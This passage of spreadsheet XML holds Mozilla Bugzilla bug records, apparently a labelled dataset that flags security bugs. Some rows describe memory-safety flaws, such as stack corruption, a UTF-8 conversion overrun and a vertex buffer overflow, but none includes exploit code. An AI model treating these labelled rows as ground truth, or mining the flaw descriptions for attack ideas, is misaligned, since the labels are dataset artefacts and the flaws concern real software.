&gt;  mallocs by size class: 8:332060; 9:31374; 10:8623; 11:15688; 12:2433; 13:1698; 14:1587; 15:391; 16:1426; 17:1357; 18:70; 19:40; 20:22;
&gt;  frees   by size class: 8:219567; 9:22423; 10:4961; 11:13499; 12:1444; 13:1211; 14:1418; 15:267; 16:1156; 17:1339; 18:57; 19:38; 20:19;
&gt;  rfrees  by size class: 8:166298; 9:7607; 10:2078; 11:8865; 12:594; 13:509; 14:423; 15:153; 16:968; 17:198; 18:26; 19:4; 20:1;
&gt;Stats: malloc large: 1489 small slow: 2310
&gt;Stats: StackDepot: 0 ids; 0M mapped
&gt;==26942== ABORTING
&gt;</t>
        </is>
      </c>
      <c r="X6037" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6038">
      <c r="A6038" t="n">
        <v>730065</v>
      </c>
      <c r="B6038" t="inlineStr">
        <is>
          <t>2012-02-23 12:24:34 -0800</t>
        </is>
      </c>
      <c r="C6038" t="inlineStr">
        <is>
          <t>Allow sort by original post date</t>
        </is>
      </c>
      <c r="D6038" t="inlineStr">
        <is>
          <t>2012-03-01 10:32:16 -0800</t>
        </is>
      </c>
      <c r="E6038" t="n">
        <v>1</v>
      </c>
      <c r="F6038" t="n">
        <v>1</v>
      </c>
      <c r="G6038" t="n">
        <v>5</v>
      </c>
      <c r="H6038" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6038" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J6038" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K6038" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6038" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6038" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6038" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6038" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6038" t="inlineStr">
        <is>
          <t>u=contributor c=questions s=2012.4 p=1</t>
        </is>
      </c>
      <c r="Q6038" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6038" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6038" t="inlineStr">
        <is>
          <t>2012-03-06</t>
        </is>
      </c>
      <c r="T6038" t="n">
        <v>1</v>
      </c>
      <c r="U6038" t="n">
        <v>0</v>
      </c>
      <c r="V6038" t="n">
        <v>4</v>
      </c>
      <c r="W6038" t="inlineStr">
        <is>
          <t>From bug 723011
We really need a sort order that is by date of original post which will make paging through threads easier and avoid missing any as other contributors are commenting and bumping stuff up.  
Do not change the default post date.
This is just the backend support (i.e. adding support for the additional ?sort= parameter).</t>
        </is>
      </c>
      <c r="X6038" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6039">
      <c r="A6039" t="n">
        <v>600696</v>
      </c>
      <c r="B6039" t="inlineStr">
        <is>
          <t>2010-09-29 14:30:54 -0700</t>
        </is>
      </c>
      <c r="C6039" t="inlineStr">
        <is>
          <t>Start running Input tests regularly on Hudson again</t>
        </is>
      </c>
      <c r="D6039" t="inlineStr">
        <is>
          <t>2011-06-23 09:29:15 -0700</t>
        </is>
      </c>
      <c r="E6039" t="n">
        <v>1</v>
      </c>
      <c r="F6039" t="n">
        <v>1</v>
      </c>
      <c r="G6039" t="n">
        <v>6</v>
      </c>
      <c r="H6039" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6039" t="inlineStr">
        <is>
          <t>Input</t>
        </is>
      </c>
      <c r="J6039" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6039" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6039" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6039" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6039" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6039" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6039" t="inlineStr"/>
      <c r="Q6039" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6039" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6039" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6039" t="n">
        <v>1</v>
      </c>
      <c r="U6039" t="n">
        <v>0</v>
      </c>
      <c r="V6039" t="n">
        <v>5</v>
      </c>
      <c r="W6039" t="inlineStr">
        <is>
          <t>Baby, come back!  Hudson hasn't run an Input test on staging since 9/19 (when it passed), and it's paramount that we get it back as we head into 1.9 and 2.0.
(I know this traditionally doesn't need a bug, but I've done it for tracking purposes.)</t>
        </is>
      </c>
      <c r="X6039" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6040">
      <c r="A6040" t="n">
        <v>842687</v>
      </c>
      <c r="B6040" t="inlineStr">
        <is>
          <t>2013-02-19 11:41:06 -0800</t>
        </is>
      </c>
      <c r="C6040" t="inlineStr">
        <is>
          <t>Stack corruption in plug-in code caused by PRBool to bool switch</t>
        </is>
      </c>
      <c r="D6040" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E6040" t="n">
        <v>1</v>
      </c>
      <c r="F6040" t="n">
        <v>1</v>
      </c>
      <c r="G6040" t="n">
        <v>6</v>
      </c>
      <c r="H6040" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6040" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J6040" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K6040" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6040" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6040" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N6040" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6040" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6040" t="inlineStr">
        <is>
          <t>[Android only][adv-main20+]</t>
        </is>
      </c>
      <c r="Q6040" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6040" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6040" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T6040" t="n">
        <v>1</v>
      </c>
      <c r="U6040" t="n">
        <v>0</v>
      </c>
      <c r="V6040" t="n">
        <v>29</v>
      </c>
      <c r="W6040" t="inlineStr">
        <is>
          <t>Filed as security bug because "stack corruption" == security in my head :)
This is the cause of Fennec crash, bug 827171. Basically PRBool is 4-bytes and bool is 1-byte, but as part of the PRBool-to-bool conversion, we are passing 1-byte bools to plugins that still expect 4-byte PRBools. Depending on ordering and packing of variables, this could end up corrupting another variable which is the case in Bug 827171.
I see at least two cases of this in nsPluginStreamListenerPeer,
[1] http://mxr.mozilla.org/mozilla-central/source/dom/plugins/base/nsPluginStreamListenerPeer.cpp#129
[2] http://mxr.mozilla.org/mozilla-central/source/dom/plugins/base/nsPluginStreamListenerPeer.cpp#479
But there could be more instances.</t>
        </is>
      </c>
      <c r="X6040" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6041">
      <c r="A6041" t="n">
        <v>1403359</v>
      </c>
      <c r="B6041" t="inlineStr">
        <is>
          <t>2017-09-26 14:51:04 -0700</t>
        </is>
      </c>
      <c r="C6041" t="inlineStr">
        <is>
          <t>Update search bar icon to photon icon</t>
        </is>
      </c>
      <c r="D6041" t="inlineStr">
        <is>
          <t>2017-10-10 05:46:14 -0700</t>
        </is>
      </c>
      <c r="E6041" t="n">
        <v>1</v>
      </c>
      <c r="F6041" t="n">
        <v>1</v>
      </c>
      <c r="G6041" t="n">
        <v>2</v>
      </c>
      <c r="H6041" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6041" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6041" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K6041" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6041" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6041" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6041" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6041" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6041" t="inlineStr">
        <is>
          <t>[reserve-photon-visual]</t>
        </is>
      </c>
      <c r="Q6041" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6041" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6041" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T6041" t="n">
        <v>1</v>
      </c>
      <c r="U6041" t="n">
        <v>1</v>
      </c>
      <c r="V6041" t="n">
        <v>54</v>
      </c>
      <c r="W6041" t="inlineStr">
        <is>
          <t>Follow on from https://bugzilla.mozilla.org/show_bug.cgi?id=1399642</t>
        </is>
      </c>
      <c r="X6041" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6042">
      <c r="A6042" t="n">
        <v>74506</v>
      </c>
      <c r="B6042" t="inlineStr">
        <is>
          <t>2001-04-02 22:34:30 -0700</t>
        </is>
      </c>
      <c r="C6042" t="inlineStr">
        <is>
          <t>enabling imglib2 has caused some pages to stop firing onload</t>
        </is>
      </c>
      <c r="D6042" t="inlineStr">
        <is>
          <t>2001-05-18 10:50:25 -0700</t>
        </is>
      </c>
      <c r="E6042" t="n">
        <v>1</v>
      </c>
      <c r="F6042" t="n">
        <v>1</v>
      </c>
      <c r="G6042" t="n">
        <v>3</v>
      </c>
      <c r="H6042" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6042" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6042" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K6042" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6042" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6042" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6042" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6042" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6042" t="inlineStr">
        <is>
          <t>[imglib]</t>
        </is>
      </c>
      <c r="Q6042" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6042" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6042" t="inlineStr">
        <is>
          <t>mozilla0.9</t>
        </is>
      </c>
      <c r="T6042" t="n">
        <v>1</v>
      </c>
      <c r="U6042" t="n">
        <v>0</v>
      </c>
      <c r="V6042" t="n">
        <v>16</v>
      </c>
      <c r="W6042" t="inlineStr">
        <is>
          <t>As libpr0n was enabled on each platform (first win32, then mac, then linux),
the following mock pages used in the page load test began to fail to fire 
onload. These are URLs to a "static" of these pages, without the reloading
javascript that drives the test. 
http://jrgm.mcom.com/perf/loadtime5/base/www.msn.com/index.html
http://jrgm.mcom.com/perf/loadtime5/base/www.spinner.com/index.html
http://jrgm.mcom.com/perf/loadtime5/base/www.zdnet.com_Gamespot.com/index.html
http://jrgm.mcom.com/perf/loadtime5/base/www.tomshardware.com/index.html
http://jrgm.mcom.com/perf/loadtime5/base/www.cnn.com/index.html
http://jrgm.mcom.com/perf/loadtime5/base/www.voodooextreme.com/index.html
Some of the above will fire onload on a second visit, or a reload of the page
(msn.com and spinner.com in my test on win2k), but definitely none will fire
onload on an initial visit. (Or, they may fire onload if left long enough, but
the test cancels a load after waiting 45 seconds for 'load' event to fire). 
This is related to libpr0n, although it may be that it is just causing some 
other code paths in other modules to be exercised differently. At any rate, 
it would be good to sort out what is happening with these pages before a 
beta date.</t>
        </is>
      </c>
      <c r="X6042" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6043">
      <c r="A6043" t="n">
        <v>451617</v>
      </c>
      <c r="B6043" t="inlineStr">
        <is>
          <t>2008-08-21 12:48:56 -0700</t>
        </is>
      </c>
      <c r="C6043" t="inlineStr">
        <is>
          <t>ConvertUTF8toUTF16 with incomplete multi-byte character sequence can cause overrun</t>
        </is>
      </c>
      <c r="D6043" t="inlineStr">
        <is>
          <t>2020-12-09 12:56:52 -0800</t>
        </is>
      </c>
      <c r="E6043" t="n">
        <v>1</v>
      </c>
      <c r="F6043" t="n">
        <v>1</v>
      </c>
      <c r="G6043" t="n">
        <v>3</v>
      </c>
      <c r="H6043" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6043" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6043" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K6043" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L6043" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6043" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6043" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6043" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6043" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q6043" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6043" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6043" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6043" t="n">
        <v>1</v>
      </c>
      <c r="U6043" t="n">
        <v>0</v>
      </c>
      <c r="V6043" t="n">
        <v>14</v>
      </c>
      <c r="W6043" t="inlineStr">
        <is>
          <t>Spun off from bug 443288 (see also bug 451613 and bug 451615)
Description from attachment 327885:
The invalid URL segment is eventually passed to ConvertUTF8toUTF16::write. This method copies the string in a loop, checking to see if the end is reached. However, the loop condition does not properly account for the scenario where the loop body passes the end of the string, which occurs when the source string ends inside a multi-byte character sequence. 
xpcom\string\public\nsUTF8Utils.h:88-90
        for ( ; p != end /* &amp;&amp; *p */; )
          {
            char c = *p++;
This results in an unbounded copy into the previously allocated stack buffer.</t>
        </is>
      </c>
      <c r="X6043" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6044">
      <c r="A6044" t="n">
        <v>1047539</v>
      </c>
      <c r="B6044" t="inlineStr">
        <is>
          <t>2014-08-01 11:09:44 -0700</t>
        </is>
      </c>
      <c r="C6044" t="inlineStr">
        <is>
          <t>Bugmails including "See Also" bug links do not include a "Referenced Bugs" section with the summary of the other bug</t>
        </is>
      </c>
      <c r="D6044" t="inlineStr">
        <is>
          <t>2019-02-19 07:18:06 -0800</t>
        </is>
      </c>
      <c r="E6044" t="n">
        <v>1</v>
      </c>
      <c r="F6044" t="n">
        <v>1</v>
      </c>
      <c r="G6044" t="n">
        <v>7</v>
      </c>
      <c r="H6044" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6044" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J6044" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K6044" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L6044" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6044" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6044" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6044" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6044" t="inlineStr"/>
      <c r="Q6044" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6044" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6044" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6044" t="n">
        <v>1</v>
      </c>
      <c r="U6044" t="n">
        <v>2</v>
      </c>
      <c r="V6044" t="n">
        <v>6</v>
      </c>
      <c r="W6044" t="inlineStr">
        <is>
          <t>Here is an example of such a bugmail:
 :Ehsan Akhgari (Back on 8/5 - not reading bugmail, needinfo? me!) changed Bug 974270 at 2014-08-01 13:50:22 EDT:
What 	Removed 	Added
See Also 	  	https://bugzilla.mozilla.org/show_bug.cgi?id=1047522
Product/Component: Core :: DOM: Device Interfaces
You are receiving this mail because:
    You are on the CC list for the bug.
    You are the assignee for the bug.
    You are watching someone on the CC list of the bug.</t>
        </is>
      </c>
      <c r="X6044" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6045">
      <c r="A6045" t="n">
        <v>1599635</v>
      </c>
      <c r="B6045" t="inlineStr">
        <is>
          <t>2019-11-26 15:43:48 -0800</t>
        </is>
      </c>
      <c r="C6045" t="inlineStr">
        <is>
          <t>Inspector markup view stays empty when refreshing jsfiddle</t>
        </is>
      </c>
      <c r="D6045" t="inlineStr">
        <is>
          <t>2022-01-10 05:56:17 -0800</t>
        </is>
      </c>
      <c r="E6045" t="n">
        <v>1</v>
      </c>
      <c r="F6045" t="n">
        <v>1</v>
      </c>
      <c r="G6045" t="n">
        <v>3</v>
      </c>
      <c r="H6045" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6045" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J6045" t="inlineStr">
        <is>
          <t>Inspector</t>
        </is>
      </c>
      <c r="K6045" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6045" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6045" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6045" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6045" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6045" t="inlineStr"/>
      <c r="Q6045" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6045" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6045" t="inlineStr">
        <is>
          <t>Firefox 73</t>
        </is>
      </c>
      <c r="T6045" t="n">
        <v>1</v>
      </c>
      <c r="U6045" t="n">
        <v>0</v>
      </c>
      <c r="V6045" t="n">
        <v>14</v>
      </c>
      <c r="W6045" t="inlineStr">
        <is>
          <t>Created attachment 9111786
browser-console.log
Was editing JSFiddle and was focused on the output iframe. On refresh, Inspector markup view was empty.</t>
        </is>
      </c>
      <c r="X6045" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6046">
      <c r="A6046" t="n">
        <v>1625980</v>
      </c>
      <c r="B6046" t="inlineStr">
        <is>
          <t>2020-03-30 08:09:35 -0700</t>
        </is>
      </c>
      <c r="C6046" t="inlineStr">
        <is>
          <t>48.34 - 55.4% raptor-webaudio-firefox (linux64, macosx, windows10) regression on push efa017cf034f4485591fd9afe0ba2960ffafadc0 (Fri March 27 2020)</t>
        </is>
      </c>
      <c r="D6046" t="inlineStr">
        <is>
          <t>2020-04-22 05:59:40 -0700</t>
        </is>
      </c>
      <c r="E6046" t="n">
        <v>1</v>
      </c>
      <c r="F6046" t="n">
        <v>1</v>
      </c>
      <c r="G6046" t="n">
        <v>7</v>
      </c>
      <c r="H6046" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6046" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J6046" t="inlineStr">
        <is>
          <t>Toolchains</t>
        </is>
      </c>
      <c r="K6046" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6046" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6046" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6046" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6046" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6046" t="inlineStr"/>
      <c r="Q6046" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R6046" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6046" t="inlineStr">
        <is>
          <t>mozilla77</t>
        </is>
      </c>
      <c r="T6046" t="n">
        <v>1</v>
      </c>
      <c r="U6046" t="n">
        <v>0</v>
      </c>
      <c r="V6046" t="n">
        <v>4</v>
      </c>
      <c r="W6046" t="inlineStr">
        <is>
          <t>Raptor has detected a Firefox performance regression from push:
https://hg.mozilla.org/integration/autoland/pushloghtml?changeset=efa017cf034f4485591fd9afe0ba2960ffafadc0
As author of one of the patches included in that push, we need your help to address this regression.
Regressions:
  55%  raptor-webaudio-firefox linux64-shippable opt              113.42 -&gt; 176.25
  53%  raptor-webaudio-firefox macosx1014-64-shippable opt        136.33 -&gt; 208.33
  50%  raptor-webaudio-firefox windows10-64-shippable-qr opt      123.83 -&gt; 186.08
  50%  raptor-webaudio-firefox linux64-shippable-qr opt           118.33 -&gt; 177.42
  49%  raptor-webaudio-firefox windows7-32-shippable opt          143.17 -&gt; 213.25
  48%  raptor-webaudio-firefox windows7-32-shippable opt          143.92 -&gt; 213.50
  48%  raptor-webaudio-firefox windows10-64-shippable opt         125.17 -&gt; 185.67
You can find links to graphs and comparison views for each of the above tests at: https://treeherder.mozilla.org/perf.html#/alerts?id=25512
On the page above you can see an alert for each affected platform as well as a link to a graph showing the history of scores for this test. There is also a link to a Treeherder page showing the Raptor jobs in a pushlog format.
To learn more about the regressing test(s) or reproducing them, please see: https://wiki.mozilla.org/TestEngineering/Performance/Raptor
*** Please let us know your plans within 3 business days, or the offending patch(es) will be backed out! ***
Our wiki page outlines the common responses and expectations: https://wiki.mozilla.org/TestEngineering/Performance/Talos/RegressionBugsHandling</t>
        </is>
      </c>
      <c r="X6046" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6047">
      <c r="A6047" t="n">
        <v>1860977</v>
      </c>
      <c r="B6047" t="inlineStr">
        <is>
          <t>2023-10-25 02:02:01 -0700</t>
        </is>
      </c>
      <c r="C6047" t="inlineStr">
        <is>
          <t>PGP encryption can change subject of E-Mail if selecting other mail A while large mail B is decrypting</t>
        </is>
      </c>
      <c r="D6047" t="inlineStr">
        <is>
          <t>2024-04-30 04:45:06 -0700</t>
        </is>
      </c>
      <c r="E6047" t="n">
        <v>1</v>
      </c>
      <c r="F6047" t="n">
        <v>1</v>
      </c>
      <c r="G6047" t="n">
        <v>3</v>
      </c>
      <c r="H6047" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6047" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J6047" t="inlineStr">
        <is>
          <t>Security: OpenPGP</t>
        </is>
      </c>
      <c r="K6047" t="inlineStr">
        <is>
          <t>Thunderbird 115</t>
        </is>
      </c>
      <c r="L6047" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6047" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6047" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6047" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6047" t="inlineStr">
        <is>
          <t>[see comment 32, 38]</t>
        </is>
      </c>
      <c r="Q6047" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6047" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6047" t="inlineStr">
        <is>
          <t>125 Branch</t>
        </is>
      </c>
      <c r="T6047" t="n">
        <v>1</v>
      </c>
      <c r="U6047" t="n">
        <v>2</v>
      </c>
      <c r="V6047" t="n">
        <v>54</v>
      </c>
      <c r="W6047" t="inlineStr">
        <is>
          <t>Created attachment 9360189
pics.zip
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0
Steps to reproduce:
Send 2 E-Mails to myself.
E-Mail A with no encryption
E-Mail B with PGP encryption and 5 MB
Open E-Mail B
While Thunderbird is loading/decrypting click to open E-Mail A
Actual results:
After E-Mail B is encrypted the subject of E-Mail A is permanently changed to the subject of E-Mail B, restarting Thunderbird does not resolve this bug.
Expected results:
Subject of E-Mail A should not change.</t>
        </is>
      </c>
      <c r="X6047" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6048">
      <c r="A6048" t="n">
        <v>1530776</v>
      </c>
      <c r="B6048" t="inlineStr">
        <is>
          <t>2019-02-26 11:32:20 -0800</t>
        </is>
      </c>
      <c r="C6048" t="inlineStr">
        <is>
          <t>Current usage metrics report</t>
        </is>
      </c>
      <c r="D6048" t="inlineStr">
        <is>
          <t>2019-05-27 10:30:22 -0700</t>
        </is>
      </c>
      <c r="E6048" t="n">
        <v>1</v>
      </c>
      <c r="F6048" t="n">
        <v>1</v>
      </c>
      <c r="G6048" t="n">
        <v>5</v>
      </c>
      <c r="H6048" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6048" t="inlineStr">
        <is>
          <t>Data Science</t>
        </is>
      </c>
      <c r="J6048" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K6048" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6048" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6048" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6048" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6048" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6048" t="inlineStr"/>
      <c r="Q6048" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6048" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6048" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6048" t="n">
        <v>1</v>
      </c>
      <c r="U6048" t="n">
        <v>0</v>
      </c>
      <c r="V6048" t="n">
        <v>2</v>
      </c>
      <c r="W6048" t="inlineStr">
        <is>
          <t>* For existing user metrics, capture where they're measured, the behavior they capture, and the history of collection.
* Describe how the metrics are correlated with each other.
* Describe how other metrics of interest correlate with the user metrics.</t>
        </is>
      </c>
      <c r="X6048" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6049">
      <c r="A6049" t="n">
        <v>1190526</v>
      </c>
      <c r="B6049" t="inlineStr">
        <is>
          <t>2015-08-03 12:49:15 -0700</t>
        </is>
      </c>
      <c r="C6049" t="inlineStr">
        <is>
          <t>Overflow in VertexBufferInterface::reserveVertexSpace causes memory-safety bug</t>
        </is>
      </c>
      <c r="D6049" t="inlineStr">
        <is>
          <t>2024-05-30 09:04:01 -0700</t>
        </is>
      </c>
      <c r="E6049" t="n">
        <v>1</v>
      </c>
      <c r="F6049" t="n">
        <v>1</v>
      </c>
      <c r="G6049" t="n">
        <v>3</v>
      </c>
      <c r="H6049" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6049" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6049" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K6049" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L6049" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6049" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6049" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6049" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6049" t="inlineStr">
        <is>
          <t>[adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q6049" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6049" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6049" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T6049" t="n">
        <v>1</v>
      </c>
      <c r="U6049" t="n">
        <v>0</v>
      </c>
      <c r="V6049" t="n">
        <v>32</v>
      </c>
      <c r="W6049" t="inlineStr">
        <is>
          <t>Created attachment 8642575
poc.js, poc.html, glMatrix-0.9.5.min.js. Extract and use as in note 0.
VertexBufferInterface::reserveVertexSpace (gfx\angle\src\libGLESv2\renderer\d3d\VertexBuffer.cpp) can incur an overflow with a specially-crafted set of shader attribute arrays. The overflow causes VertexBufferInterface::storeVertexAttributes to fail to allocate a large-enough buffer, then to write the contents of one or more shader attribute arrays (whose contents an attacker can prescribe) far beyond the buffer's end.
